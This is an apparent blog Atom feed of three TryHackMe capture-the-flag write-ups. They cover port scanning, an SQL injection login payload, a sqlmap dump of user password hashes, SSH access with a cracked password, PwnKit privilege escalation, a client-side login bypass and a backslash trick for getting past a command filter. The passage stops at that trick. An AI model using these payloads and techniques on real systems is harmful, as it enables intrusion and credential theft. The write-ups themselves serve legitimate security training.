<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.9.2">Jekyll</generator><link href="http://0xshushu.github.io/blog/feed.xml" rel="self" type="application/atom+xml" /><link href="http://0xshushu.github.io/blog/" rel="alternate" type="text/html" /><updated>2022-06-04T20:33:54+00:00</updated><id>http://0xshushu.github.io/blog/feed.xml</id><title type="html">0xShushu</title><subtitle>blog about hacking &amp; IT</subtitle><entry><title type="html">Madeye’s castle - TryHackMe write-up</title><link href="http://0xshushu.github.io/blog/Madeye'sCastle-THM/" rel="alternate" type="text/html" title="Madeye’s castle - TryHackMe write-up" /><published>2022-06-04T00:00:00+00:00</published><updated>2022-06-04T00:00:00+00:00</updated><id>http://0xshushu.github.io/blog/Madeye'sCastle-THM</id><content type="html" xml:base="http://0xshushu.github.io/blog/Madeye'sCastle-THM/">&lt;p&gt;Write-up for Madeye’s Castle TryHackMe CTF&lt;/p&gt;

&lt;p&gt;Hi hackers, today I’m gonna write up Madeye’s Castle, a medium TryHackMe CTF.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*C4ZjHeB6jB9l_loX.jpeg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;user&quot;&gt;User&lt;/h2&gt;
&lt;p&gt;First, I did port scanning with rustscan and nmap:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ rustscan -a madeye.thm -t 2000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at &quot;/home/ubuntu/.rustscan.toml&quot; 
Open 10.10.220.41:22
Open 10.10.220.41:80
Open 10.10.220.41:139
Open 10.10.220.41:445
$ nmap -p22,80,139,445 -A -T4 -oN port.txt madeye.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2022-06-04 18:35 CEST
Nmap scan report for madeye.thm (10.10.220.41)
Host is up (0.11s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:5f:48:fa:3d:3e:e6:9c:23:94:33:d1:8d:22:b4:7a (RSA)
|   256 53:75:a7:4a:a8:aa:46:66:6a:12:8c:cd:c2:6f:39:aa (ECDSA)
|_  256 7f:c2:2f:3d:64:d9:0a:50:74:60:36:03:98:00:75:98 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: Amazingly It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: HOGWARTZ-CASTLE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: HOGWARTZ-CASTLE, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: &amp;lt;unknown&amp;gt; (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: hogwartz-castle
|   NetBIOS computer name: HOGWARTZ-CASTLE\x00
|   Domain name: \x00
|   FQDN: hogwartz-castle
|_  System time: 2022-06-04T16:35:58+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-06-04T16:35:58
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.84 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;We had three services: SSH (22), HTTP (80) and SMB (139, 445), so I started testing SMB.
First I enumerated the available shares:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ smbclient -L \\\\madeye.thm\\
Enter WORKGROUP\ubuntu's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	sambashare      Disk      Harry's Important Files
	IPC$            IPC       IPC Service (hogwartz-castle server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;I noticed sambashare, so I connected to it (anonymously, with -N) and downloaded all the files it contained:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ smbclient -N \\\\madeye.thm\\sambashare\\
Try &quot;help&quot; to get a list of possible commands.
smb: \&amp;gt; ls
  .                                   D        0  Thu Nov 26 02:19:20 2020
  ..                                  D        0  Thu Nov 26 01:57:55 2020
  spellnames.txt                      N      874  Thu Nov 26 02:06:32 2020
  .notes.txt                          H      147  Thu Nov 26 02:19:19 2020

		9219412 blocks of size 1024. 4411804 blocks available
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The file spellnames.txt contained a wordlist, whereas the hidden file .notes.txt contained the following:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Hagrid told me that spells names are not good since they will not &quot;rock you&quot;
Hermonine loves historical text editors along with reading old books.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;After that I started enumerating HTTP, which was hosting the Apache default page:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_madeyescastle/apachedefaultpage.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;But I found something interesting by looking at the source code:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_madeyescastle/sourcecode.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There’s a vhost, hogwartz-castle.thm, so I added it to /etc/hosts and started testing it:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_madeyescastle/hogwartz.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It was hosting a login page, so I tested for SQL injection, LDAP injection, XPath injection and so on; it was vulnerable to SQL injection:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;user=x ' or 1=1-- -&amp;amp;password=x&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;And it redirected me to a JSON response:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;{&quot;error&quot;:&quot;The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection... keep digging&quot;}&lt;/code&gt;&lt;/p&gt;
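&lt;p&gt;Why that payload works, as an added Python example that is not the room’s code nor part of the original write-up: a minimal SQLite login check with the string-built query next to a parameterised one. It assumes the app keeps a users table with name and password columns holding unsalted SHA-512 hex digests; the rows themselves are constructed.&lt;/p&gt;

```python
import hashlib
import sqlite3

# Constructed sample rows for this example. The column layout mirrors a users
# table (name, password, admin, notes); the values are made up.
SAMPLE_USERS = [
    ("Lucas Washington", "example-pass-1", 0, "contact administrator"),
    ("Harry Turner", "example-pass-2", 0, "My linux username is my first name"),
]

# The same payload the write-up sends in the user field.
PAYLOAD = "x ' or 1=1-- -"


def sha512_hex(text):
    """Unsalted SHA-512 hex digest (128 hex chars), the assumed storage format."""
    return hashlib.sha512(text.encode()).hexdigest()


def build_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users(name text not null, password text not null, "
        "admin int not null, notes text not null)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(n, sha512_hex(p), a, notes) for n, p, a, notes in SAMPLE_USERS],
    )
    return conn


def lookup_vulnerable(conn, user):
    """Vulnerable lookup: the user field is spliced into the SQL text, so the
    quote closes the string literal, 'or 1=1' widens the WHERE clause to every
    row and '--' comments out the trailing quote. Returns (name, hash) or None."""
    sql = f"SELECT name, password FROM users WHERE name = '{user}'"
    return conn.execute(sql).fetchone()


def lookup_safe(conn, user):
    """Hardened lookup: the value is bound as a parameter, so the whole payload
    is compared as a literal name and is never parsed as SQL."""
    return conn.execute(
        "SELECT name, password FROM users WHERE name = ?", (user,)
    ).fetchone()


def authenticate(conn, lookup, user, password):
    """Returns which row the query matched (if any) and whether the password
    verified. The room's 'password for X is incorrect' message corresponds to
    matched=X with ok=False: the injected condition selected a row on its own."""
    row = lookup(conn, user)
    if row is None:
        return {"matched": None, "ok": False}
    name, stored = row
    return {"matched": name, "ok": stored == sha512_hex(password)}


def demo():
    """Runs the payload through both lookups plus one legitimate login."""
    conn = build_db()
    return {
        "vulnerable": authenticate(conn, lookup_vulnerable, PAYLOAD, "x"),
        "safe": authenticate(conn, lookup_safe, PAYLOAD, "x"),
        "legit": authenticate(conn, lookup_safe, "Harry Turner", "example-pass-2"),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```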

&lt;p&gt;So I enumerated the tables with sqlmap and it found one table:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ sqlmap -u &quot;http://hogwartz-castle.thm/login&quot; --data=&quot;user=x&amp;amp;password=x&quot; -p user --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.9#stable}
|_ -| . [&quot;]     | .'| . |
|___|_  [&quot;]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:59:56 /2022-06-04/

[18:59:56] [INFO] resuming back-end DBMS 'sqlite' 
[18:59:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: user=-5956' OR 9310=9310-- XEXb&amp;amp;password=x
---
[18:59:56] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: SQLite
[18:59:56] [INFO] fetching tables for database: 'SQLite_masterdb'
[18:59:56] [INFO] fetching number of tables for database 'SQLite_masterdb'
[18:59:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:59:57] [INFO] retrieved: 
[1 table]
+-------+
| users |
+-------+
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;After that I dumped the users table:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ sqlmap -u &quot;http://hogwartz-castle.thm/login&quot; --data=&quot;user=x&amp;amp;password=x&quot; -p user -T users --dump
        ___
       __H__
 ___ ___[&quot;]_____ ___ ___  {1.5.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [&quot;]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:02:19 /2022-06-04/

[19:02:19] [INFO] resuming back-end DBMS 'sqlite' 
[19:02:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: user=-5956' OR 9310=9310-- XEXb&amp;amp;password=x
---
[19:02:19] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: SQLite
[19:02:19] [INFO] resumed: CREATE TABLE users(\nname text not null,\npassword text not null,\nadmin int not null,\nnotes text not dddd)
[19:02:19] [INFO] fetching entries for table 'users'
[19:02:19] [INFO] fetching number of entries for table 'users' in database 'SQLite_masterdb'
[19:02:19] [INFO] resumed: 40
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Lucas Washington
[19:02:19] [INFO] resumed: contact administrator. Congrats on SQL injection... keep digging
[19:02:19] [INFO] resumed: c53d7af1bbe101a6b45a3844c89c8c06d8ac24ed562f01b848cad9925c691e6f10217b6594532b9cd31aa5762d85df642530152d9adb3005fac407e2896bf492
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Harry Turner
[19:02:19] [INFO] resumed: My linux username is my first name, and password uses best64
[19:02:19] [INFO] resumed: b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Andrea Phillips
[19:02:19] [INFO] resumed:  contact administrator. Congrats on SQL injection... keep digging
[19:02:19] [INFO] resumed: e1ed732e4aa925f0bf125ae8ed17dd2d5a1487f9ff97df63523aa481072b0b5ab7e85713c07e37d9f0c6f8b1840390fc713a4350943e7409a8541f15466d8b54
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Liam Hernandez
[19:02:19] [INFO] resumed: contact administrator. Congrats on SQL injection... keep digging
[19:02:19] [INFO] resumed: 5628255048e956c9659ed4577ad15b4be4177ce9146e2a51bd6e1983ac3d5c0e451a0372407c1c7f70402c3357fc9509c24f44206987b1a31d43124f09641a8d
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Adam Jenkins
[19:02:19] [INFO] resumed: contact administrator. Congrats on SQL injection... keep digging
[19:02:19] [INFO] resumed: 2317e58537e9001429caf47366532d63e4e37ecd363392a80e187771929e302922c4f9d369eda97ab7e798527f7626032c3f0c3fd19e0070168ac2a82c953f7b
[19:02:19] [INFO] resumed: 0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;I noticed the note on the user Harry Turner, so I cracked his SHA-512 hash using &lt;a href=&quot;https://www.dcode.fr/sha512-hash&quot;&gt;this&lt;/a&gt; web tool:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_madeyescastle/cracked.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;So I logged into SSH using the credentials harry:wingardiumleviosa123:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ ssh harry@madeye.thm
Warning: Permanently added the ECDSA host key for IP address '10.10.220.41' to the list of known hosts.
harry@madeye.thm's password: 
 _      __    __                     __         __ __                          __
 | | /| / /__ / /______  __ _  ___   / /____    / // /__  ___ __    _____ _____/ /____
 | |/ |/ / -_) / __/ _ \/  ' \/ -_) / __/ _ \  / _  / _ \/ _ `/ |/|/ / _ `/ __/ __/_ /
 |__/|__/\__/_/\__/\___/_/_/_/\__/  \__/\___/ /_//_/\___/\_, /|__,__/\_,_/_/  \__//__/
                                                        /___/

Last login: Thu Nov 26 01:42:18 2020
harry@hogwartz-castle:~$ 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;We got user!&lt;/p&gt;

&lt;h2 id=&quot;root&quot;&gt;Root&lt;/h2&gt;
&lt;p&gt;Once I had a shell I needed root, so I started enumerating the OS and found something in the Linux version:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ uname -a
Linux hogwartz-castle 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;It’s running an old, unpatched build, so I uploaded PwnKit (CVE-2021-4034; note the bug is in polkit’s pkexec, not in the kernel itself) to the machine and ran it:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_madeyescastle/root.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It worked, we got root!
See you at the next post, keep hacking&lt;/p&gt;</content><author><name></name></author><summary type="html">Write-up for Madeye’s Castle TryHackMe CTF</summary></entry><entry><title type="html">CyberHeroes - TryHackMe Write-up</title><link href="http://0xshushu.github.io/blog/CyberHeroes-THM/" rel="alternate" type="text/html" title="CyberHeroes - TryHackMe Write-up" /><published>2022-05-28T00:00:00+00:00</published><updated>2022-05-28T00:00:00+00:00</updated><id>http://0xshushu.github.io/blog/CyberHeroes-THM</id><content type="html" xml:base="http://0xshushu.github.io/blog/CyberHeroes-THM/">&lt;p&gt;Write-up for CyberHeroes TryHackMe CTF&lt;/p&gt;

&lt;p&gt;Hi hackers, today I’m gonna write up CyberHeroes, a medium TryHackMe CTF.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://tryhackme-images.s3.amazonaws.com/room-icons/e8874c2d58c8ff0df78b5183fb828c81.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;flag&quot;&gt;Flag&lt;/h2&gt;
&lt;p&gt;First, I did port scanning with rustscan and nmap to find any open ports:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ rustscan -a cyberheroes.thm -t 2000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at &quot;/home/ubuntu/.rustscan.toml&quot;
Open 10.10.40.61:22
Open 10.10.40.61:80

$ nmap -p22,80 -A -oN port.txt -T4 cyberheroes.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-28 20:36 CEST
Nmap scan report for cyberheroes.thm (10.10.40.61)
Host is up (0.32s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.48 ((Ubuntu))
|_http-server-header: Apache/2.4.48 (Ubuntu)
|_http-title: CyberHeros : Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.72 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We have two open ports: 22 (SSH) and 80 (HTTP) so I started testing HTTP.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_cyberheroes/imagine_sito.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;HTTP is hosting a website called CyberHeroes; I immediately noticed the login page:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_cyberheroes/login.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;That login uses client-side JavaScript authentication; here’s its source code:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;function authenticate() {
      a = document.getElementById('uname')
      b = document.getElementById('pass')
      const RevereString = str =&amp;gt; [...str].reverse().join('');
      if (a.value==&quot;h3ck3rBoi&quot; &amp;amp; b.value==RevereString(&quot;54321@terceSrepuS&quot;)) { 
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
          if (this.readyState == 4 &amp;amp;&amp;amp; this.status == 200) {
            document.getElementById(&quot;flag&quot;).innerHTML = this.responseText ;
            document.getElementById(&quot;todel&quot;).innerHTML = &quot;&quot;;
            document.getElementById(&quot;rm&quot;).remove() ;
          }
        };
        xhttp.open(&quot;GET&quot;, &quot;RandomLo0o0o0o0o0o0o0o0o0o0gpath12345_Flag_&quot;+a.value+&quot;_&quot;+b.value+&quot;.txt&quot;, true);
        xhttp.send();
      }
      else {
        alert(&quot;Incorrect Password, try again.. you got this hacker !&quot;)
      }
    }
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;That script checks whether the username equals h3ck3rBoi and whether the password equals RevereString(“54321@terceSrepuS”), so the username is h3ck3rBoi, whereas to get the password’s value we can
run the piece of script that reverses the string in node; here’s the result:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ node
Welcome to Node.js v12.22.5.
Type &quot;.help&quot; for more information.
&amp;gt; const RevereString = str =&amp;gt; [...str].reverse().join('');
undefined
&amp;gt; RevereString(&quot;54321@terceSrepuS&quot;)
'[REDACTED]'
&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Now we have the username and password, let’s log in:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_cyberheroes/post.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Here’s our flag! See you at the next post, keep hacking&lt;/p&gt;</content><author><name></name></author><summary type="html">Write-up for CyberHeroes TryHackMe CTF</summary></entry><entry><title type="html">Chill hack - TryHackMe write-up</title><link href="http://0xshushu.github.io/blog/Chillhack-THM/" rel="alternate" type="text/html" title="Chill hack - TryHackMe write-up" /><published>2022-05-09T00:00:00+00:00</published><updated>2022-05-09T00:00:00+00:00</updated><id>http://0xshushu.github.io/blog/Chillhack-THM</id><content type="html" xml:base="http://0xshushu.github.io/blog/Chillhack-THM/">&lt;p&gt;Write-up for Chill hack TryHackMe CTF&lt;/p&gt;

&lt;p&gt;Hi hackers, today I’m gonna write up Chill hack, an easy TryHackMe CTF.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_chillhack/chillhack.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;user&quot;&gt;User&lt;/h2&gt;
&lt;p&gt;First, I did port scanning with rustscan and nmap to find any open ports:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ rustscan -a chillhack.thm -t 2000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

Open 10.10.161.188:21
Open 10.10.161.188:22
Open 10.10.161.188:80

$ nmap -p21,22,80 -A -oN port.txt chillhack.thm
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.53.247
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;After that I started enumerating all the services, starting with FTP: port 21 was hosting an FTP server allowing anonymous access, so I connected and downloaded every file:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ ftp chillhack.thm
ftp&amp;gt; ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 03  2020 .
drwxr-xr-x    2 0        115          4096 Oct 03  2020 ..
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
226 Directory send OK.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;note.txt contained the following content:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Anurodh told me that there is some filtering on strings being put in the command -- Apaar
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Then, I started testing HTTP (port 80), which was hosting the following static web page:
&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_chillhack/webpage.png&quot; alt=&quot;&quot; /&gt;
That page contained nothing useful, so I did a directory brute force with dirsearch:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ dirsearch -u http://chillhack.thm -w $LIST/directory/dir.txt -t 50 -o directory.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 329449

Output File: /home/ubuntu/ctf/tmp/directory.txt

Error Log: /home/ubuntu/.local/lib/python3.9/site-packages/dirsearch/logs/errors-22-05-09_21-24-51.log

Target: http://chillhack.thm/

[21:24:52] Starting: 
[21:25:14] 301 -  312B  - /css  -&amp;gt;  http://chillhack.thm/css/
[21:25:29] 301 -  314B  - /fonts  -&amp;gt;  http://chillhack.thm/fonts/
[21:25:38] 301 -  315B  - /images  -&amp;gt;  http://chillhack.thm/images/
[21:25:41] 301 -  311B  - /js  -&amp;gt;  http://chillhack.thm/js/
[21:26:03] 301 -  315B  - /secret  -&amp;gt;  http://chillhack.thm/secret/
[21:26:04] 403 -  278B  - /server-status
[21:26:19] 200 -   34KB - /index.html

Task Completed
&amp;lt;dirsearch.dirsearch.Program object at 0x7f7cbef0b730&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;I noticed the secret page and found it offered remote command execution; I tried to execute some commands, but there’s a filter blocking them:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_chillhack/rce.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;To bypass this filter we can use a backslash in the command name: the shell removes it before running the command, so the filter never matches:&lt;/p&gt;

